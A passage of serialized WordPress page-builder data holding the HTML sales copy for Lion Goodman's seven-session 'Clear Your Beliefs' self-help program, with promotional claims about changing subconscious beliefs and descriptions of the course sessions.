go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:62424:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n<p><ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not 